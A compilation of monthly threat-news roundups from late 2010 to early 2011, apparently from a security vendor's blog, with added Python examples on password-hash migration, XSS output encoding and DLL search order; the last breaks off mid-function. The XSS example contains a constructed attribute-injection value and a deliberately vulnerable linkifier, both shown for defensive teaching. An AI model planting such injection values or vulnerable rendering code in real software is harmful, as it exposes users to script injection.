We had at least two more victims of malicious hacking this month. Lush left its customers exposed to credit card fraud for several months, and Trapster leaked the details of more than 10 million registered users. Sometimes being warned about speed cameras is not actually that valuable.

 

On 27 January 2011 the world went dark, at least for Egypt. All communication channels were suspended by the national government in an apparently desperate effort to block political protests. More than 80 million people were cut off. You should probably book holidays in a different location this year.

 

Open source software development and distribution portal SourceForge was hit by a major attack, which compromised several of its servers; others were shut down proactively. It looks like "you-know-who" does not like open source at all. Who is "you-know-who", though?

 

Unlike the Egyptian government, Tunisia apparently decided to keep communications on but intercept all user names and passwords for the major Web 2.0 portals, including Gmail, Facebook, and Yahoo. Injected JavaScript was found on the login pages of all the mentioned Web sites, "siphoning off login credentials" as users typed them; the injection was possible because the pages were served over plain HTTP through the national ISP. One government rules them all. By the way, Tunisia is not the greatest destination this year either.

 

Amazon was apparently mimicking Gawker. A legacy password implementation meant that older Amazon.com accounts' passwords were effectively case-insensitive and ignored any characters beyond the first eight, so the password "protected" was accepted as "PROTECTED" or, even better, as "ProtecTED1234" and so forth. This applied to older accounts only, so simply changing your password (even to the same one) stores it under the current scheme and makes things much more secure. Have you been with Amazon for a long time? Go and change your password "just for fun".
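Why would "change it to the same password" fix anything? Because the fix is in how the password is stored, not in the password. The example below is added for this roundup and is not Amazon's code: the legacy hasher is a constructed model of the reported behaviour (case-folded and cut to eight characters before hashing, in the manner of classic Unix crypt), the modern hasher runs the whole password through a salted PBKDF2, and the login routine re-hashes a legacy account under the modern scheme the first time its owner logs in successfully. The iteration count and the eight-character cut-off are assumptions.

```python
import hashlib
import hmac
import os

LEGACY_SIGNIFICANT_CHARS = 8   # assumption modelled on classic crypt(3), which ignores bytes beyond eight
PBKDF2_ITERATIONS = 100_000    # assumption for the upgraded scheme


def legacy_hash(password, salt):
    """Constructed model of the old scheme: case-folded and cut to eight characters before hashing."""
    material = password.upper()[:LEGACY_SIGNIFICANT_CHARS].encode("utf-8")
    return hashlib.sha1(salt + material).digest()


def modern_hash(password, salt):
    """Upgraded scheme: the whole password, case preserved, through a slow salted KDF."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)


HASHERS = {"legacy": legacy_hash, "modern": modern_hash}


def new_record(password, scheme="modern"):
    """Account record as stored: scheme name, per-user salt, hash."""
    salt = os.urandom(16)
    return {"scheme": scheme, "salt": salt, "hash": HASHERS[scheme](password, salt)}


def verify(record, candidate):
    expected = HASHERS[record["scheme"]](candidate, record["salt"])
    return hmac.compare_digest(record["hash"], expected)   # constant-time comparison


def login_and_upgrade(record, candidate):
    """Verify the password; on success, migrate a legacy record to the modern scheme in place.

    The plaintext is only available at login, which is why the migration happens here and why
    a user 'changing' to the same password also ends up on the new scheme.
    """
    if not verify(record, candidate):
        return False
    if record["scheme"] == "legacy":
        record.update(new_record(candidate, "modern"))
    return True


if __name__ == "__main__":
    account = new_record("protected", "legacy")
    print("legacy accepts PROTECTED:", verify(account, "PROTECTED"))          # True: the old flaw
    print("login upgrades:", login_and_upgrade(account, "protected"), account["scheme"])
    print("modern accepts PROTECTED:", verify(account, "PROTECTED"))          # False: fixed
```

Two details carry over to any real migration: keep the scheme name in the record so both hashers can coexist during the transition, and never try to "convert" old hashes offline, since the hash of an eight-character uppercased prefix tells you nothing about the real password.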

 

Web 2 dot uh oh

A slew of malicious attacks hit Facebook this month. A worm disguised as a photo viewer application tricked users into installing malware when the "View Photo" button was clicked. Koobface is making its rounds once more, employing a couple of new tactics, as a new campaign spread using compromised accounts to send out direct messages. French President Nicolas Sarkozy's and Facebook CEO Mark Zuckerberg's fan pages were apparently hacked and used to distribute unusual political messages.

 

Facebook celebrated Data Privacy Day by offering users the option to enable HTTPS connections. It also introduced Social Authentication, a concept very similar to an image CAPTCHA, but instead of dictionary images it shows pictures of a user's Facebook friends and asks him or her to name the person shown.

 

Malware authors abused Google's redirection service, goo.gl, in their Twitter worm campaign which ultimately redirects users to fake AV sites.

 

Browser and friends

Google Chrome has fixed multiple vulnerabilities in stable channel versions prior to 8.0.552.237. These vulnerabilities include a stack corruption vulnerability in the PDF renderer component, two memory corruption vulnerabilities in the Vorbis decoder, and a video frame size error resulting in a bad memory access.

 

The VirusTotal Web site released a plugin for Firefox named VTzilla. It allows users to scan downloads directly with VirusTotal's Web application before storing them. Moreover, it will not only scan files, but also URLs.

 

Apple fixed a man-in-the-middle attacker vulnerability in OS X 10.6. This vulnerability may be able to cause an unexpected application termination or arbitrary code execution if using a special formatted string in PackageKit's handling of distribution scripts.

 

Microsoft

The start of 2011 feels a bit far away by now, but it was just the start of the year that unleashed a new zero-day vulnerability in Microsoft’s Graphics Rendering Engine (CVE-2010-3970). The exploit takes advantage of the way thumbnails or previews are processed and presented to the user by Explorer.exe and can be triggered by crafting an exploit file and sending it to a target (the victim must view the file in a folder where thumbnails or previews are enabled). The security hole hasn't been patched yet and has been added to the Metasploit framework.

 

January’s patch Tuesday brings an end to 3 major security holes in two released updates. One critical update fixes two issues in Microsoft Data Access Components (MDAC) where one of them could allow taking over a targeted system by visiting a specially crafted Web page (MS11-002). The second update fixes an issue in Microsoft Backup Manager where opening a legitimate remote Windows backup manager file can load a specially crafted malicious library – if located in the same directory (MS11-001). No attacks for any of the updates have been spotted in the wild. There are two holes in Windows that are yet to be patched, the mentioned vulnerability in Microsoft’s Graphical Rendering Engine and a vulnerability in Internet Explorer’s Cascading Style Sheets (CVE-2010-3971). We alerted on both vulnerabilities here and here. If you're wondering why Microsoft didn’t release a patch for those two holes in January’s patch Tuesday despite the fact that they have publicly available proof-of-concept code, how they prioritize patches is explained in their Research and Defense blog.

 

The end of January brings another vulnerability in Windows: this time it’s not remote code execution but a vulnerability in the MHTML protocol handler that could allow “information disclosure”. This effectively means that the MHTML protocol could be used to perform an XSS attack on the local machine when a user opens an HTML file with Internet Explorer (any version of it). More details on a workaround to prevent this attack, and some examples, are in the Microsoft Security Research and Defense blog.

 

Some good news for Microsoft as it released some updates to its secure development tools suite. One of the tools is called “Attack Surface Analyzer”, which aims to give security professionals a clear picture of the changes an installed application makes to the system, allowing them to determine any security implications. It does that by “diffing” the state of the system before and after the application is installed. The tool is in beta and available for 64-bit versions of Windows only. More details about the tool are here.

 

Hello ThreatSeeker. You've got mail!

Just when we thought it was all over! In contrast to the previous month, spam might have taken a short vacation but it sure is not a permanent one.

 

January saw the Return Of The Spam, and we drew the conclusion that as long as there is a profit to be made with spamming, spammers will always be around. The blip and the consequent drop in spam were short-lived, although we can just about conclude that spammers like the holidays just as the rest of us do.

 

January also saw the awakening of Waledac, which seemed to have gone offline for a few days until, apparently, a new set of instructions was received from the C&C to wake up. Monitoring the behavior after the bot awoke showed it was geared to send out spam marketing the magic blue pill.

 

Towards the end of the month, we noticed within our ThreatSeeker network that spammers are quite up to date, having capitalized on the deadline for self assessment tax within the UK and similarly for filing tax returns in the USA.


Security Trends

An Android Froyo (2.2) vulnerability reported by Thomas Cannon last year should have been fixed by now. However, Xuxian Jiang proved that it is still present even with the newest Android Gingerbread (2.3). The data stealing exposure is not that great but still worrying enough to keep the browser far away from unknown sites.

 

The BlackBerry Attachment Service was hit with a critical PDF flaw. When a specially crafted PDF file is opened on a smartphone associated with a BlackBerry Enterprise Server running the service, it can cause an unexpected process termination and arbitrary code execution. PDF complexity is haunting more than the Windows and Mac OS platforms.

 

Allegedly several major Web sites (gov,mil,edu) have been hacked and put up for sale by a hacker claiming to be from the Anonymous group. Most likely SQL injections put more than a dozen of such Web sites into a vulnerable position freely offering credentials and personal data to interested parties. Did you want to easily get accepted to a university?

 

Shortly after Mozilla announced support for the "Do-Not-Track" mechanism, which lets users choose what data may be collected about their browsing habits and preferences, Google also released a Chrome extension letting users opt out of tracking cookies from different ad networks. The end of targeted ads on the Internet? We wish.

When all legitimate services evolve, fraudsters have to do the same to remain "in the game". After targeting most major online banks, the ZeuS creators started to adjust their "state of the art" for online payment providers too. Moneybookers, Nochex, Netspend and also E-gold became further victims of this infamous malware. Are we going to use cash once again?

 

German security researcher Thomas Roth claims to have hacked into WPA-PSK protected Wi-Fi networks using Amazon EC2 cloud services and a specialized program he wrote. The worries over what the cloud makes possible are becoming true.

 

Java trojans targeting Windows, Mac, and Linux computers at the same time are becoming a new trend among cybercriminals. Jnanabot is one of the latest. Do you really use Java on your computer?

 

This month's roundup contributors:

Ivan Sabo
Mary-Grace Timcang
Lei Li
Elad Sharf
Amon Sanniez

Filed under:

Ivan Sabo

This Month in the Threat Webscape - December 2010
Posted: 17 Jan 2011 05:52 PM

Month of December

Major Hits

December was completely flooded by the "Wikileaks case." Anonymous launched a series of DDoS attacks against "the enemies": the PayPal blog, PostFinance, EveryDNS, Mastercard and many others. Low Orbit Ion Cannon (LOIC) also showed strong potential.

Thanks to a vulnerability open to the world for 6 months, 1.5 million usernames, email addresses, and DES-encrypted passwords were released on Pirate Bay. Anonymous was involved again. Can you guess who we are talking about? Gawker Media did not receive good PR this time.

Once again, an undisclosed number of customers' private details such as email addresses, contact information, and birthdates were leaked from the McDonalds database. There were no burger give-aways though.

Browser and friends

Google reacted to the threats exploiting PDF and Flash. Sandbox, a Google technology, is a method of isolating an application from the rest of the operating system while tightly controlling its resources. The Chrome 8.0.552.215 update includes a new built-in PDF viewer that is secured in Chrome's sandbox. PDF files are contained within the sandbox environment. Twelve vulnerabilities were fixed in this version. In mid December, Google extended the sandbox to support Adobe's Flash Player plug-in in its Chrome browser.

Two zero-day vulnerabilities were found in Internet Explorer. One of the vulnerabilities, CVE-2010-3971, allows remote attackers to cause a denial of service and execute arbitrary code via multiple @import calls in a crafted document. Details can be found here.

Mozilla released a security update to patch 11 vulnerabilities, 9 of which are rated "critical" because they can be used to run attacker code.

Apple shipped a new version of QuickTime Player with 15 security holes fixed.

 

Microsoft

On Black Tuesday December 2010, Microsoft released 17 bulletins intended to patch 40 vulnerabilities across Windows, Office, Internet Explorer, SharePoint Server, and Exchange. Of the bunch, 2 bulletins were rated critical, 14 important, and 1 moderate. 

In total, Microsoft delivered 106 security bulletins in 2010, the highest number in history.

Microsoft was also confronted with 2 zero-day vulnerabilities this month. The first vulnerability (CVE-2010-3971) targets the way Internet Explorer handles Cascading Style Sheets (CSS). The second vulnerability is found in the Microsoft WMI Administrative Tools WBEMSingleView.ocx ActiveX control. Both exploits can be used by remote attackers to take complete control of a vulnerable system.

Hello ThreatSeeker. You've got mail!

Spam levels declined in December compared with November 2010.  There were 2 significant points in December.

First we saw a drastic decrease in the output of spam from bots, particularly Rustock.  This became apparent during Christmas time.

An increase in spam output was seen on January 10. However, spam levels are still not yet back to November levels.

Also significant in December was the New Year-themed spam output from a bot widely speculated as being associated with Waledac/Storm. Spammers were up to their usual social engineering tricks pushing out Happy New Year videos.

Security Trends

Gallup's 2010 crime survey found that computer-related crime is a growing problem for average Americans. Eleven percent of U.S. adults reported that during the past year, they or a household member were victims of a computer or Internet crime on their home computer. This is up from the 6% to 8% level found in the previous 7 years.

A new Android Trojan called Geinimi emerged from China at the end of December 2010, displaying botnet characteristics. The malware compromises a significant amount of information on a user's Android smartphone and sends the information to remote servers. The information it collects includes location coordinates and unique identifiers for the device (IMEI) and SIM card (IMSI).

 

On the topic of computer security for 2011 you may be interested to read our Threat Report which details the threats that we predict will pick up pace in 2011.  Read it here.

 

This month's roundup contributors:

  • Carl Leonard
  • Lei Li
  • Ivan Sabo
  • Ulysses Wang
  • Xue Yang
Filed under:

Ivan Sabo

This Month in the Threat Webscape - November 2010
Posted: 13 Dec 2010 06:32 PM

Month of November

Major Hits

Amnesty International's Web site in Hong Kong was compromised and was attempting to infect its visitors using various exploits for Adobe Flash, Adobe Shockwave, Apple Quicktime, and even the latest zero-day for Internet Explorer. In other parts of Asia, India's number 1 financial portal (moneycontrol.com) was also compromised and injected with a malicious iframe.

Malicious hackers capitalized on important local and global events, such as midterm elections (US), Veteran's Day (US), and Prince William's engagement (UK), to infect more Web users via poisoned search engine results. This scam is of the usual garden variety: fake antivirus Web sites, or sites offering fake Adobe updates and fake Firefox updates, which prompt a user to download an .exe file that is really malware.

Web 2 dot uh oh

Google recently launched "Google Instant Previews," a new service that aims to give Google-rs a bird's eye view of what the site they are about to visit looks like.  This service should initially protect users against unwanted content, but our research proves that it could mislead users when snapshots used in the service are not as current as assumed.

Social engineering is the game in Facebook this month. Our Defensio Facebook App spotted scam wall posts containing a link that attempts to post on the victim's behalf.  Phishing messages claiming to be from Facebook Security warn that a user account will be deactivated unless it's reconfirmed.  The phishing page itself is either loaded from within Facebook via iframe or redirected from the link provided in the message.

Browser and friends

Adobe released a security update for Adobe Flash Player in early November. Eighteen security holes have been patched, including vulnerability CVE-2010-3654, which is a zero-day vulnerability in the wild found in October.

 

Another zero-day vulnerability (CVE-2010-4091) has been identified in Adobe Reader 9.4 (and earlier versions) and Adobe Acrobat 9.4 (and earlier versions). A proof of concept has been published that it could lead to a Denial of Service, although that has not been demonstrated. Arbitrary code execution may be possible. Adobe patched the hole in 2 weeks; the security update is here.

 

A vulnerability in Shockwave Player has been discovered. Successful exploitation allows the execution of arbitrary code, but a user must be tricked into opening the "Shockwave Settings" window when viewing a Web page.

 

Google patched several high-risk vulnerabilities in Chrome 7.0.517.44. A $7500 award was paid out of Google's new vulnerability reward program.

A Denial of Service vulnerability has been found in Firefox 3.6.12. The proof of concept is published here.

 

The recent security update for Safari 5.0.3 and 4.1.3 contains 27 patched vulnerabilities. More than 40 vulnerabilities have been patched in iOS 4.2. Click here for details.

Microsoft

This month's round of "Black Tuesday" Microsoft patches was rather light, but contained fixes for some particularly severe issues.

On the unpatched side, Windows is currently vulnerable to 2 known privilege escalation exploits, one of which was found in a kernel API, allowing users to bypass User Account Control (UAC) entirely. The second, an exploit originally used in Stuxnet, attacked the Windows Task Scheduler.

Internet Explorer once again finds itself host to an actively exploited bug (CVE-2010-3962) caused by a dereferencing error.

Hello ThreatSeeker. You've got mail!

An increase in the number of phishing emails has been a focal point over the course of this month. Most of them seem to be directed attacks at Email Service Providers (ESPs) in order for the attackers to gain access to "industry-grade email deployment systems" to do their bidding.  Spear-phishing, as it is known to most, is on the rise with several of these messages having the look and feel of legitimate requests to the unsuspecting user.  Like most of the email campaigns reported in the past, the format is usually the same: A user is lured into clicking a link within an email or to open an attachment, which results in the machine being infected.

Also this month, with the release of the new, improved version of Adobe Reader, came the recycled phishing email messages enticing and advising users to upgrade their readers to the newer version with all the bells and whistles. As reported in Lenny Zeltser's blog, the format of these messages did not change much. These types of email messages are not new, although it is interesting to note that cyber-criminals are keeping abreast of current changes and news and taking advantage of them.

Security Trends

A new version of the GpCode ransomware has been detected, using RSA-1024 and AES-256 as its crypto-algorithms. It is now stronger than before, because it overwrites the data in the files instead of deleting them after encryption, so users cannot get the data back by using data-recovery software.


Google announced an experimental new vulnerability reward program that applies to Google Web properties. Google said it would pay the bounty for any serious bug that “directly affects the confidentiality or integrity of user data.”

Adobe released the Reader X version on November 19, 2010. A built-in sandbox feature has been implemented to contain the damage from potentially malicious PDF files. Adobe's blog posted a multi-part series about the new sandboxing technology used in the Adobe Reader.

A security researcher named Nitesh Dhanjani has discovered that a rogue Web site, or a Web site whose client code has been compromised by a persistent XSS, can pull the user out of the Safari browser in iOS. A malicious Web site can initiate a phone call without the user's explicit permission by abusing insecure handling of URL schemes. He also discusses a particular UI spoofing behavior of Safari on iPhone: because full-screen apps in iOS use UIWebView as the default Web browser, a page can display a fake URL bar while the real URL bar is hidden.

This month's roundup contributors:

  • Jay Liew
  • Lei Li
  • Grace Timcang
  • Ulysses Wang
  • Amon Sanniez
  • Paul Westin

 

Filed under:

Jay Liew

This Month in the Threat Webscape - October 2010
Posted: 12 Nov 2010 07:30 PM

Month of October 2010

Major Hits

Websense Security Labs discovered that the official Web site of the Nobel Peace Prize was compromised by malicious hackers. The hackers inserted code that infects visitors using Mozilla Firefox. This zero day vulnerability has since been patched.

The exploitation of vulnerabilities in Java has spiked dramatically, as brought to light by Holly Stewart from the Microsoft Malware Protection Center (see chart below). 

The attacks can largely be attributed to 3 vulnerabilities:

CVE ID | Attacks | Computers | Description
 | 3,560,669 | 1,196,480 | A deserialization issue in vulnerable versions of JRE (Java Runtime Environment) allows remote code execution through Java-enabled browsers on multiple platforms, such as Microsoft Windows, Linux, and Apple Mac OS X.
 | 2,638,311 | 1,119,191 | Another remote code execution, multi-platform issue caused by improper parsing of long file:// URL arguments.
 | 213,502 | 173,123 | Another deserialization issue, very similar to CVE-2008-5353.
 


(Image and stats from Microsoft)

 

Web 2 dot uh oh

The Web site of the popular and perhaps most-used Facebook API, Open Graph (opengraphprotocol.org), was compromised, leading users to a standard rogue AV landing page. The same malcode was seen on every single page of the Web site.

Lindsay Lohan is the celebrity decoy of October's social engineering scheme.  Fake Facebook invites enticed users to view sex tapes about the controversial actress.  Links included in the invitations turn out to be a typical survey spam page at the time.

Towards the end of the month, a cross-platform Facebook worm that mimics some Koobface qualities heated up the information security sphere. Facebook users received messages with links to a video. This worm, known as Boonana, lured users into installing a Java applet when the link enclosed with the message was clicked. When users allowed the installation, other malicious components were downloaded. A closer look at the Boonana code sparked further interest since it contained code indicating that it was targeting Mac OS X.

 

A new zero-day vulnerability (CVE-2010-3654) was discovered in Adobe Flash Player at the end of October. The vulnerability caused a crash and potentially allowed an attacker to take control of the affected system. Here are some details. A PDF file with an embedded Flash file object exploited this vulnerability. Another zero-day vulnerability (CVE-2010-3653) was found in Adobe Shockwave Player. Here, a remote attacker could exploit the vulnerability to execute arbitrary code or cause a denial of service via a Director movie with a crafted rcsl chunk. The exploit code is published here. Also, a new mega patch for Adobe Reader was released, and 23 security holes have been fixed.

 

Mozilla released 9 bulletins in the middle of October, including 5 critical updates. When the Nobel Peace Prize Web site was compromised, a zero-day vulnerability (CVE-2010-3765) in Firefox was exploited to drop a Belmoo trojan on unsuspecting visitors' systems; Mozilla patched the vulnerability very quickly.

 

Google released a security update for its Chrome browser to fix 11 vulnerabilities.

 

Oracle delivered a mega patch for Java SE and Java for Business. 29 security vulnerabilities were fixed. The patch for Java on Mac OS was released here.

 

According to RealNetworks, 7 vulnerabilities in RealPlayer were fixed here.

 

Microsoft 

Microsoft sent out an astounding 16 bulletins meant to patch 49 vulnerabilities in the Windows operating system, Internet Explorer, the .NET Framework and Microsoft Office on October's Black Tuesday. Patches for vulnerabilities that could allow remote code execution in Internet Explorer (MS10-071), Media Player Network Sharing (MS10-075), the Embedded OpenType Font Engine (MS10-076) and the .NET Framework (MS10-077) are deemed to be the most critical fixes and should be treated with high priority this month.

 

Hello Threatseeker. You've got mail!

This month, Websense Security Labs saw spammers returning to some of their trickiest treats to fool email recipients.  Sorry, I couldn't resist the Halloween reference since it's October.  We saw that spammers were stuffing their messages with legitimate content to try and evade spam filters.  With one of the many campaigns we saw this month, the messages were leading to an unfamiliar target called World Pharmacy.  These messages were interesting because they were abusing legitimate site reputations much in the same way malicious attackers usually do.  The links in the messages were leading to URLs injected into legitimate sites which were meant to simply redirect to these World Pharmacy spam sites.  In an extension to this campaign, we also saw that spammers were attempting to take advantage of the ultimate reputation by using Google Translation services to redirect to software sites. 

Security trends

A PDF vulnerability was found in the BlackBerry Enterprise Server component that the BlackBerry Attachment Service runs on. This security hole, discovered in the PDF distiller, could allow a malicious individual to cause buffer overflow errors, leading to a Denial of Service (DoS) condition or possibly arbitrary code execution. It was triggered when users opened PDFs on their BlackBerries.

Microsoft has added Zeus disinfection instructions onto its malicious software removal tool (MSRT). It nuked Zeus (also called Zbot) 281,491 times from 274,873 computers in one week. MSRT scans Windows computers for infections by specific, prevalent malicious software. This tool is updated and released on the second Tuesday of each month, and Zbot is the latest addition to MSRT’s ever-growing list of malware.

A vulnerability for iPhone was posted to a MacRumors forum by a New Zealand iPhone user who figured out a sequence of key taps that rendered the passcode useless. It's a trivial way to bypass the four-digit passcode lock on fully patched iPhone (iOS 4.1) devices.

Security researchers found that the first version of the Koobface malware targeting Mac OS X users was spreading via links in messages on social networking sites such as Facebook, MySpace, and Twitter. The malicious Web sites attempted to trick Mac OS X users into running a Java applet in order to open a video file.

The past few months have been very busy with zero-day flaws affecting popular products. In total, those vulnerabilities accounted for 108 non-patch days - that's 88.5% of vulnerable time in 4 months.

Murofet malware is similar to Conficker in that it generates thousands of domains daily that it then contacts for updates.

This month's round up contributors

  • Ulysses Wang
  • Lei Li
  • Mary Grace Timcang
  • Chris Astacio
  • Jay Liew

 

Filed under:

Jay Liew

This Month in the Threat Webscape - September 2010
Posted: 14 Oct 2010 06:33 PM

Month of September

 

Major Hits

Stuxnet was the major story last month. After the presentations at Virus Bulletin 2010 [1,2] Stuxnet has gotten even more attention. CVE-2010-2883, a 0-day in Adobe Reader, was another major story.

A malicious injection targeting Song Lyrics put Google users at risk, thanks to Google Instant. Finally, Google Code was found to be hosting malicious Web content, specifically the Ultimate BlackHat Tool Kit.

 

Web 2 dot uh oh

"Links lead to more Links" - you are just 2 clicks away from being infected. Use of Link Analysis to find objectionable or malicious content and ACE (Advanced Classification Engine) technology gives us in-depth insight into security threats on the social Web and helps protect our users. Over 40 percent of Facebook posts contain a URL and 10 percent of those are either spam or malicious. Take a look at some tips for avoiding the potential dangers of user generated content in our Websense Insight: Link Analysis blog. Visit Defensio.com for the only social media threat detection application that protects social media sites and Facebook pages from spam or profanity.

The highlight in Web 2.0 this month was a "OnMouseOver" flaw on twitter.com. The flaw, caused by XSS (cross-site scripting), delivered pop-ups to users when they moused over specially-crafted tweets. The tweets contained JavaScript code that ran the OnMouseOver event, which enabled the code to run without requiring a mouse click. The issue could potentially have been used by malware authors to spread malicious tweets that redirected users to malicious Web sites. The flaw was patched and is no longer exploitable.
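The flaw above is an output-encoding failure: a user-controlled value was written into an HTML attribute without encoding. The added example below is not Twitter's code; it pairs a hypothetical naive linkifier with a hardened one and a small check that lists the attributes a browser would see on the rendered link. The sample tweet is constructed, with a placeholder handler x() in place of any script.

```python
"""Output encoding for user-supplied tweet text (the twitter.com OnMouseOver flaw).

Added example, not Twitter's code. SAMPLE_TWEET is constructed: the "URL" in it
carries a closing quote followed by an extra attribute, the shape the flaw
described above relied on. The hypothetical vulnerable renderer splices the raw
URL into the href attribute; the hardened one HTML-encodes every untrusted value
for the context it is written into.
"""
import html
import re

# Constructed sample tweet; x() is a placeholder for whatever handler was injected.
SAMPLE_TWEET = 'see http://example.test/p"onmouseover="x()" now'

# One capturing group so re.split() keeps the URLs; \S+ lets quotes into the match.
URL_RE = re.compile(r'(https?://\S+)')


def vulnerable_linkify(text: str) -> str:
    """Naive linkifier: the raw URL lands inside an attribute and as text."""
    return URL_RE.sub(lambda m: '<a href="%s">%s</a>' % (m.group(1), m.group(1)), text)


def hardened_linkify(text: str) -> str:
    """Encode each piece for HTML before it is placed in markup."""
    out = []
    for i, piece in enumerate(URL_RE.split(text)):
        safe = html.escape(piece, quote=True)   # quote=True also encodes " and '
        if i % 2 == 1:                          # odd indices are the URL matches
            out.append('<a href="%s">%s</a>' % (safe, safe))
        else:
            out.append(safe)
    return "".join(out)


def anchor_attribute_names(rendered: str) -> list:
    """Attribute names a browser would see on the first <a> tag.

    A lightweight check, not a full HTML parser: per the HTML tokenizer rules an
    attribute name may start right after whitespace or after a closing quote.
    """
    m = re.search(r'<a\b([^>]*)>', rendered)
    if not m:
        return []
    return re.findall(r'(?:^|["\'\s])([A-Za-z-]+)=', m.group(1))


if __name__ == "__main__":
    for name, render in (("vulnerable", vulnerable_linkify), ("hardened", hardened_linkify)):
        markup = render(SAMPLE_TWEET)
        print(name, anchor_attribute_names(markup), markup)
```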

 

Browser and friends

A number of security flaws on some of the most-used media players - Apple's iTunes and QuickTime, and Real Network's RealPlayer, hit the September headlines.  While RealPlayer and iTunes released patches for known vulnerabilities, QuickTime faced a classic drive-by 0-day that may lead to arbitrary code execution by visiting malicious Web sites or images. Websense® ACE (Advanced Classification Engine) identified and protected our customers against this attack at least a month before this news broke out.


Google Chrome marked its 2nd birthday by delivering patches for 15 known vulnerabilities. Firefox also released patches for 15 vulnerabilities, including fixes for the DLL load hijacking issue. Apple released patches for 3 security holes in its Safari browser, 2 of which affect WebKit, the open-source rendering engine used by Safari and iTunes.


A security update for Adobe Flash Player was released mid-September for a 0-day that allowed the attacker to gain control of affected systems. CVE-2010-2884 affects Flash Player version 10.1.82.76 and earlier, Adobe Reader 9.3.4 and earlier, and Adobe Acrobat 9.3.4 and earlier.

 

Microsoft

Major DLL load hijacking issues crossed over from the end of August to the beginning of last month affecting not only Microsoft, but other popular vendors as well.  Microsoft then released a one-click 'Fix It' tool a day after the delivery of the CWDIllegalInDllSearch utility, which secures the system by rejecting unsafe DLL loading behavior. Both tools work hand-in-hand to protect users against the latest DLL load hijacking issues that ultimately lead to remote code execution attacks.

10 bulletins meant to fix at least 11 known vulnerabilities in Windows and MS Office Suite were dispatched in this month's Patch Tuesday, 7 of which are for remote code execution. Critical patches are for Print Spooler Service (MS10-061), MPEG-4 Codec (MS10-062), Unicode Scripts Processor (MS10-063), and Microsoft Outlook (MS10-064).

 

Hello Threatseeker. You've got mail!

The start of the month saw the use of an old trick involving an .scr file masquerading as a .pdf file in the "Here You Have" malicious emails.  It is interesting that there is no need to re-invent the wheel when you can simply recycle methods and processes, in this case an old worm being spread by different means.  Surprisingly, this escaped most AV engines, as verified on VirusTotal.

Jumping on the band wagon of using any means to get users' attention and to propagate attacks, this month saw further blended attacks employing everyday tools we have grown accustomed to, such as Skype-themed malicious emails and Facebook password reset emails leading users to rogue AV downloads.  

There is no shortage of the use of social networking sites or related emails to spread malware. However, the intriguing aspect of these attacks is that they are blended; what happens in the background, unknown to the user, is pertinent. One might think they have been redirected to a rogue AV site and that is all, but they could have potentially kicked off a chain reaction with redirects to an exploit site where an exploit kit or other damaging content would be downloaded to the user's machine.

Later in the month, there was the use of tragic news to spread malicious content, as in the case of the death of Daniel Covington. The blended attack in this case did not only take users to a Rogue AV download page but also downloaded the Phoenix exploit kit. 

This month teaches us two things, in our opinion: "Spammers will use any means to propagate their malware" and "We need to pay special attention to blended attacks."

Security Trends

The Route to Malware shows that just 2 clicks can get to malicious code on an infected Web site. Websense researchers looked at how most Internet users were only 2 clicks away from malicious content in one of three ways: from top sites, poisoned search results, and malicious links.
 
Fake warning pages start displaying in a user's browser. The trick was used by a new rogue AV program as a social engineering scheme to trick users into downloading and installing the rogue.  The fake warning pages are so similar to the real thing that they can trick even highly-trained eyes.
 
Security vulnerabilities prevent companies from adopting Web 2.0 in their business practices. McAfee released their Global Web 2.0 Report in September. As they said, the top perceived threats of Web 2.0 usage by employees are malicious software (35 percent were concerned about it), viruses (15 percent), overexposure of information (11 percent), and spyware (10 percent).

This month's roundup contributors:

  • Saeed Abu-Nimeh
  • Artem Gololobov
  • Mary Grace Timcang
  • Amon Sanniez
  • Lei Li
  • Jay Liew
Filed under:

Jay Liew

This Month in the Threat Webscape - August 2010
Posted: 15 Sep 2010 08:49 AM

Month of August 2010

 

Major hits

Mass compromises & infections
Network Solutions, one of the oldest domain registrars in the world, was found to be serving up a malicious widget on its customers' Web sites. All sites that opted to display a "Small Business Success Index" widget were infecting their visitors. This includes sites not hosted by Network Solutions itself, such as Google Blogger accounts that installed the widget. Armorize has a more detailed analysis here, and pegged the number of compromised sites at a minimum of half a million (source: Google) or five million (source: Yahoo). It was also discovered that this widget is served up as part of the standard domain parking page for new domains registered.

Web hosting companies Media Temple and Rackspace also found themselves compromised and accidentally serving up malicious code to their visitors.

DLL Hijacking
Another tactic for infecting users, dubbed "DLL hijacking", grabbed headlines this month. When you start an application on Windows (e.g. Microsoft PowerPoint), large applications more often than not search a series of locations for "helper" libraries (DLLs) that assist with the job. Knowing that the application will go looking for a library it does not ship with, an attacker can place a malicious DLL of the same name in a location the application searches before it finds the real one (or where no real one exists), typically the directory of a document the victim opens, so that the application loads the malicious file believing it is the correct library. This vulnerability class has been added to Metasploit; check out this video to see it in action.
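The following is an added example (not code from the original post, and not the Metasploit module) that models the Windows DLL search order so you can see exactly when a planted DLL wins. The directories, file names and the "evil-share" path are constructed for illustration; the search orders follow Microsoft's documented LoadLibrary behaviour with and without SafeDllSearchMode, and the CWDIllegalInDllSearch option from KB2264107. The 16-bit system directory and the KnownDLLs list are left out for brevity.

```python
"""Model Windows DLL search order to show when a planted DLL gets loaded.

Added example, not code from the original post or from Metasploit. The
"file system" below is a constructed dict, not a real machine.
"""

APP_DIR = r"C:\Program Files\Viewer"      # constructed application directory
SYSTEM32 = r"C:\Windows\System32"
WINDIR = r"C:\Windows"
SHARE = r"\\evil-share\docs"             # constructed remote share holding the lure document
PATH = [SYSTEM32, WINDIR]

# Constructed file system: directory -> files present there.
FS = {
    APP_DIR: {"viewer.exe", "shipped.dll"},           # DLL the app ships with
    SYSTEM32: {"sysonly.dll"},                        # DLL that lives only in System32
    WINDIR: set(),
    SHARE: {"quarterly.ppt", "helper.dll", "sysonly.dll"},  # attacker-planted DLLs
}


def search_order(app_dir, cwd, safe_mode=True, exclude_cwd=False):
    """Directories that LoadLibrary("x.dll") probes, in order.

    safe_mode=True  -> SafeDllSearchMode (default since XP SP2): the current
                       directory is searched only after the system directories.
    safe_mode=False -> legacy order: the current directory comes right after
                       the application directory.
    exclude_cwd     -> models the CWDIllegalInDllSearch registry value
                       (KB2264107), which removes the current directory entirely.
    """
    cwd_slot = [] if exclude_cwd else [cwd]
    if safe_mode:
        order = [app_dir, SYSTEM32, WINDIR, *cwd_slot, *PATH]
    else:
        order = [app_dir, *cwd_slot, SYSTEM32, WINDIR, *PATH]
    seen, unique = set(), []
    for d in order:                       # PATH repeats the system dirs; keep first hit
        if d.lower() not in seen:
            seen.add(d.lower())
            unique.append(d)
    return unique


def resolve(dll, app_dir, cwd, safe_mode=True, exclude_cwd=False):
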